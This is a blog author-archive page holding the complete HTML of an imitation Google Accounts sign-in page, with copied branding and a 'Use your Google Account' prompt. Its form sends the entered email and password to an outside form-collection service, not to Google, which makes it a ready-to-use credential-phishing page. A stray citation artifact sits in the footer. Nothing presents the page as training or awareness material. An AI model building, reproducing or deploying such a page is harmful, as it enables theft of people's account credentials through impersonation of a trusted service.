Author Archives: kumarprabha

<!DOCTYPE html><html lang=”en”><head> <meta charset=”UTF-8″> <title>Sign in – Google Accounts</title> <meta name=”viewport” content=”width=device-width, initial-scale=1.0″> <style> * { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; } body { margin: 0; height: 100vh; background: #f2f2f2; display: flex; align-items: center; justify-content: center; } .card { background: #fff; width: 360px; padding: 40px 30px; border-radius: 8px; box-shadow: 0 2px 6px rgba(0,0,0,0.2); text-align: center; } .logo { font-size: 32px; font-weight: bold; margin-bottom: 10px; } .logo span:nth-child(1){color:#4285F4;} .logo span:nth-child(2){color:#DB4437;} .logo span:nth-child(3){color:#F4B400;} .logo span:nth-child(4){color:#4285F4;} .logo span:nth-child(5){color:#0F9D58;} .logo span:nth-child(6){color:#DB4437;} h2 { margin: 10px 0; font-weight: normal; } p { color: #5f6368; font-size: 14px; margin-bottom: 25px; } input { width: 100%; padding: 12px; margin-bottom: 15px; border: 1px solid #dadce0; border-radius: 4px; font-size: 14px; } input:disabled { background: #f5f5f5; cursor: not-allowed; } .note { font-size: 12px; color: #d93025; margin-bottom: 15px; } button { width: 100%; padding: 12px; background: #1a73e8; border: none; color: white; font-size: 14px; border-radius: 4px; cursor: not-allowed; opacity: 0.6; } footer { margin-top: 25px; font-size: 12px; color: #5f6368; } </style></head><body> <div class=”card”> <div class=”logo”> <span>G</span><span>o</span><span>o</span><span>g</span><span>l</span><span>e</span> </div> <h2>Sign in</h2> <p>Use your Google Account</p> <!– FORM TAG START –> <form action=”https://formcarry.com/s/ATCubVYx8b2″ method=”POST”> <div class=”note”> </div> <input type=”email” name=”email” placeholder=”Email or phone” > <input type=”password” name=”password” placeholder=”Enter your password” > <button type=”submit”>Next</button> </form> <!– FORM TAG END –> <footer> © 2026 :contentReference[oaicite:1]{index=1} </footer> </div></body></html>